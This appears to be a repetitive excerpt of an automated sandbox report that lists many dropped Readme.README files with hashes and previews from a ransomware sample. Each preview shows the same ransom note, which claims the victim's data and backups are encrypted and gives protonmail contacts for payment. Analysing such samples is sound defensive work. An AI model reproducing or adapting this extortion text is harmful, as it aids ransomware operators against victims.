                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\1\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\2\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
